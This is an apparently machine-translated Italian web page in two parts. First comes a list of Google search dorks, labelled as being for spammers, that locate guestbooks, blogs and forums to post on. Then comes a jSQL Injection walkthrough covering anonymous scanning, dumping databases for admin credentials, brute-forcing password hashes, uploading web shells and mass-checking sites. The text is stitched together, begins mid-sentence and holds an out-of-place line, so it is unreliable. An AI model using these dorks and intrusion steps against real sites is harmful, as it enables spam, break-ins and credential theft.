intext: cerca solo la parola specificata nel testo della pagina, ignorando il titolo, i testi dei collegamenti e altre cose non correlate. Esiste anche un derivato di questo modificatore - allintext: i.e. inoltre, tutte le parole nella query verranno cercate solo nel testo, che può anche essere importante, ignorando le parole usate di frequente nei collegamenti
Per esempio, testo:forum

intervallo date: ricerche all'interno di un intervallo di tempo (intervallo date: 2452389-2452389), le date degli orari sono in formato giuliano.

Bene, e tutti i tipi di esempi interessanti di query

Esempi di scrittura di query per Google. Per gli spammer

Inurl:control.guest?a=segno

Sito:books.dreambook.com “URL della home page” “Firma il mio” inurl:firma

Sito: www.freegb.net Home page

Inurl:sign.asp “Conteggio caratteri”

“Messaggio:” inurl:sign.cfm “Mittente:”

Inurl:register.php “Registrazione Utente” “Sito Web”

Inurl:edu/guestbook “Firma il libro degli ospiti”

Inurl: pubblica “Pubblica commento” “URL”

Inurl:/archives/ “Commenti:” “Ricordi informazioni?”

"Script e libro degli ospiti creati da:" "URL:" "Commenti:"

Inurl:?action=aggiungi “phpBook” “URL”

Titolo: "Invia nuova storia"

Riviste

Inurl:www.livejournal.com/users/mode=reply

Inurl Greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Libro degli ospiti"

Blog

Inurl:blogger.com/comment.g?”postID””anonimo”

Inurl:typepad.com/ “Pubblica un commento” “Ricordi le informazioni personali?”

Inurl:greatestjournal.com/community/ “Pubblica commento” “indirizzi di autori anonimi”

“Pubblica commento” “indirizzi di autori anonimi” -

Titolo:"Pubblica commento"

Inurl:pirillo.com “Pubblica commento”

Forum

Inurl:gate.html?”nome=Forum” “modalità=rispondi”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”membri.html”

Inurl:forum/elencomembri.php?"

Esegui il file scaricato facendo doppio clic (è necessario disporre di una macchina virtuale).

3. Anonimato durante il controllo di un sito per SQL injection
Configurazione di Tor e Privoxy su Kali Linux

[Sezione in fase di sviluppo]

Configurazione di Tor e Privoxy su Windows

[Sezione in fase di sviluppo]

Impostazioni proxy in jSQL Injection

[Sezione in fase di sviluppo]

4. Controllare il sito per l'SQL injection con jSQL Injection

Lavorare con il programma è estremamente semplice. Basta inserire l'indirizzo del sito web e premere INVIO.

Lo screenshot seguente mostra che il sito è vulnerabile a tre tipi di SQL injection (le informazioni su di essi sono indicate nell'angolo in basso a destra). Facendo clic sui nomi delle iniezioni è possibile cambiare il metodo utilizzato:

Inoltre, i database esistenti ci sono già stati visualizzati.

È possibile visualizzare il contenuto di ciascuna tabella:

In genere, la cosa più interessante delle tabelle sono le credenziali dell'amministratore.

Se sei fortunato e trovi i dati dell'amministratore, è troppo presto per rallegrarti. Devi ancora trovare il pannello di amministrazione dove inserire questi dati.

5. Cerca i pannelli di amministrazione con jSQL Injection

Per fare ciò, vai alla scheda successiva. Qui veniamo accolti da un elenco di possibili indirizzi. Puoi selezionare una o più pagine da controllare:

La comodità sta nel fatto che non è necessario utilizzare altri programmi.

Sfortunatamente, non sono molti i programmatori imprudenti che memorizzano le password in chiaro. Molto spesso nella riga della password vediamo qualcosa di simile

8743b52063cd84097a65d1633f5c74f5

Questo è un pasticcio. Puoi decrittografarlo usando la forza bruta. E... jSQL Injection ha un brute forcer integrato.

6. Hash di forza bruta utilizzando jSQL Injection

L'indubbia comodità è che non è necessario cercare altri programmi. È disponibile il supporto per molti degli hash più popolari.

Questa non è l'opzione migliore. Per diventare un guru nella decodifica degli hash, si consiglia il libro “” in russo.

Ma, naturalmente, quando non c'è nessun altro programma a portata di mano o non c'è tempo per studiare, jSQL Injection con la sua funzione di forza bruta integrata tornerà molto utile.

Ci sono impostazioni: puoi impostare quali caratteri sono inclusi nella password, l'intervallo di lunghezza della password.

7. Operazioni sui file dopo il rilevamento delle iniezioni SQL

Oltre alle operazioni con i database, lettura e modifica degli stessi, se vengono rilevate iniezioni SQL, è possibile eseguire le seguenti operazioni sui file:

  • leggere i file sul server
  • caricamento di nuovi file sul server
  • caricamento delle shell sul server

E tutto questo è implementato in jSQL Injection!

Esistono delle restrizioni: il server SQL deve avere privilegi sui file. Gli amministratori di sistema intelligenti li hanno disabilitati e non saranno in grado di accedere al file system.

La presenza di privilegi sui file è abbastanza semplice da verificare. Vai a una delle schede (lettura file, creazione di una shell, caricamento di un nuovo file) e prova a eseguire una delle operazioni specificate.

Un'altra nota molto importante: dobbiamo conoscere l'esatto percorso assoluto del file con cui lavoreremo, altrimenti non funzionerà nulla.

Guarda lo screenshot seguente:

Ad ogni tentativo di operare su un file ci viene risposto: No FILE privilegio (nessun privilegio sul file). E qui non si può fare nulla.

Se invece hai un altro errore:

Problema durante la scrittura in [nome_directory]

Ciò significa che hai specificato erroneamente il percorso assoluto in cui vuoi scrivere il file.

Per indovinare un percorso assoluto, è necessario conoscere almeno il sistema operativo su cui è in esecuzione il server. Per fare ciò, passa alla scheda Rete.

Questa voce (riga Win64) ci dà motivo di supporre che abbiamo a che fare con il sistema operativo Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connessione: Metodo Keep-Alive: HTTP/1.1 200 OK Lunghezza contenuto: 353 Data: venerdì, 11 dicembre 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tipo di contenuto: text/html; set di caratteri=UTF-8

Qui abbiamo alcuni Unix (*BSD, Linux):

Codifica trasferimento: Chunked Data: venerdì 11 dicembre 2015 11:57:02 GMT Metodo: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connessione: keep-alive Tipo di contenuto: text/html X- Fornito da: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

E qui abbiamo CentOS:

Metodo: HTTP/1.1 200 OK Scadenza: giovedì 19 novembre 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connessione: keep-alive X-Cache-Lookup: MISS da t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS da t1.hoster.ru Controllo cache: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Data: venerdì 11 dicembre 2015 12:08:54 GMT Codifica di trasferimento: Tipo di contenuto in blocchi: text/html; set di caratteri=WINDOWS-1251

Su Windows, una cartella tipica per i siti è C:\Server\data\htdocs\ . Ma, in effetti, se qualcuno "ha pensato di" creare un server su Windows, allora, molto probabilmente, questa persona non ha sentito nulla sui privilegi. Pertanto, dovresti iniziare a provare direttamente dalla directory C:/Windows/:

Come puoi vedere, tutto è andato bene la prima volta.

Ma le stesse shell jSQL Injection sollevano dubbi nella mia mente. Se disponi dei privilegi sui file, puoi caricare facilmente qualcosa con un'interfaccia web.

8. Controllo in blocco dei siti per iniezioni SQL

E anche questa funzione è disponibile in jSQL Injection. Tutto è estremamente semplice: scarica un elenco di siti (puoi importare da un file), seleziona quelli che desideri controllare e fai clic sul pulsante appropriato per avviare l'operazione.

Conclusione da jSQL Injection

jSQL Injection è uno strumento valido e potente per la ricerca e l'utilizzo delle iniezioni SQL trovate sui siti Web. I suoi indubbi vantaggi: facilità d'uso, funzioni correlate integrate. jSQL Injection può essere il migliore amico dei principianti quando analizza i siti web.

Tra i difetti noterei l'impossibilità di modificare i database (almeno io non ho trovato questa funzionalità). Come tutti gli strumenti GUI, uno degli svantaggi di questo programma può essere attribuito alla sua incapacità di essere utilizzato negli script. Tuttavia, in questo programma è possibile anche una certa automazione, grazie alla funzione integrata di controllo di massa del sito.

Il programma jSQL Injection è molto più comodo da usare rispetto a sqlmap. Ma sqlmap supporta più tipi di SQL injection, ha opzioni per lavorare con file firewall e alcune altre funzioni.

In conclusione: jSQL Injection è il migliore amico di un hacker alle prime armi.

L'aiuto per questo programma nell'Enciclopedia Kali Linux può essere trovato in questa pagina: http://kali.tools/?p=706